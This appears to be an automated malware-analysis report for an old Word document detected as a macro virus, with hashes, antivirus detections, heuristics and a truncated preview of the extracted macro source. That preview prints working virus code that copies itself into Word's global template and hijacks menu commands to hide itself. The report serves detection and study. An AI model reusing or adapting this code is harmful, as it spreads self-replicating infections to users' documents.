Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aec5da630a13bcbd…

MALICIOUS

Office (OLE)

46.0 KB Created: 1999-06-13 19:42:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 84dfca191bc820a6983372a34c83ba54 SHA-1: 05e03fd9134493e0bb37724ce88c64a77a0ec005 SHA-256: aec5da630a13bcbd8ca8e9d1ca704eefa6d5eb2c9ac43624ae66d997225deeb9
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy macro virus, with high-severity firings for OLE_LEGACY_WORDBASIC_MACRO_VIRUS and OLE_VBA_AUTOOPEN. The VBA macro code attempts to copy its AutoOpen and FileSave routines to the global template, a common technique for macro malware to achieve persistence and spread. The ClamAV detections further confirm its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Minimal-68 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Minimal-68
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39218 bytes
SHA-256: 76aaf4e9786db010e48a6f9a1ebaef871f4644a7ec1646c94f6f684dc9067713
Detection
ClamAV: Doc.Trojan.Rut-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FileSave"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
Dim I
Dim F$
Dim G$
Dim H$
Dim I_$
ReDim AI__$(0)
Dim J
Dim Rnd_$
Dim K
Dim B1$
Dim B2$
Dim B3$
Dim B4$
Dim B5$
Dim B6$
Dim B7$
Dim B8$
Dim B9$
Dim B0$
Dim Y$
Dim T
Dim dlg As Object
    WordBasic.DisableInput 1
    On Error GoTo -1: On Error GoTo ErrFClose
    Dim Allready: Let Allready = 0
    
    '** Check macros ID in GlobalTemplate
     For I = 1 To WordBasic.CountMacros(0)
      If Len(WordBasic.[MacroName$](I, 0)) = 20 Then
        F$ = Mid(WordBasic.[MacroName$](I, 0), 20, 1)
        G$ = Mid(WordBasic.[MacroName$](I, 0), 1, 1)
        H$ = Mid(WordBasic.[MacroName$](I, 0), 19, 1)
        I_$ = Mid(WordBasic.[MacroName$](I, 0), 2, 1)
        If (F$ = G$) And (H$ = I_$) Then
         Let Allready = -1
        End If
      End If
     Next I
    
    If Not Allready Then
    '** Dilakukan bila global belum tertular
       WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoOpen"
       WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileSave", "Global:FileSave"

    '** Polymorphic engine
       ReDim AI__$(11)
       For J = 1 To WordBasic.CountMacros(1)
       If Len(WordBasic.[MacroName$](J, 1)) = 20 Then
         F$ = Mid(WordBasic.[MacroName$](J, 1), 20, 1)
         G$ = Mid(WordBasic.[MacroName$](J, 1), 1, 1)
         H$ = Mid(WordBasic.[MacroName$](J, 1), 19, 1)
         I_$ = Mid(WordBasic.[MacroName$](J, 1), 2, 1)
         If (F$ = G$) And (H$ = I_$) Then
              Rnd_$ = WordBasic.[MacroName$](J, 1)
              'MsgBox(MacroName$(J, 1))
              For K = 1 To 10
                AI__$(K) = String(1, num)
              Next K
              B1$ = AI__$(1): B2$ = AI__$(2)
              B3$ = AI__$(3): B4$ = AI__$(4)
              B5$ = AI__$(5): B6$ = AI__$(6)
              B7$ = AI__$(7): B8$ = AI__$(8)
              B9$ = AI__$(9): B0$ = AI__$(10)
              Y$ = ""
              For T = 1 To 10
                Y$ = AI__$(T) + Y$
              Next T
              WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + Rnd_$, "Global:" + Y$ + B1$ + B2$ + B3$ + B4$ + B5$ + B6$ + B7$ + B8$ + B9$ + B0$

              '* Stealth mode
              WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + Rnd_$, "Global:ToolsMacro"
              WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + Rnd_$, "Global:ViewToolBars"
              WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + Rnd_$, "Global:FileTemplates"
              WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + Rnd_$, "Global:ToolsCustomize"
              WordBasic.SaveTemplate
         End If
       End If
      Next J


    Else
         '** Dilakukan bila Global telah tertular
         For J = 1 To WordBasic.CountMacros(0)
          If Len(WordBasic.[MacroName$](J, 0)) = 20 Then
          F$ = Mid(WordBasic.[MacroName$](J, 0), 20, 1)
          G$ = Mid(WordBasic.[MacroName$](J, 0), 1, 1)
          H$ = Mid(WordBasic.[MacroName$](J, 0), 19, 1)
          I_$ = Mid(WordBasic.[MacroName$](J, 0), 2, 1)
           If (F$ = G$) And (H$ = I_$) Then
             'MsgBox("Ialah  " + MacroName$(J, 0))
             Rnd_$ = WordBasic.[MacroName$](J, 0)
             WordBasic.MacroCopy "Global:FileSave", WordBasic.[FileName$]() + ":FileSave"
             WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[FileName$]() + ":AutoOpen"
             WordBasic.MacroCopy "Global:" + Rnd_$, WordBasic.[FileName$]() + ":" + Rnd_$

             WordBasic.FileSummaryInfo Update:=1
             Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
             WordBasic.CurValues.Fi
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.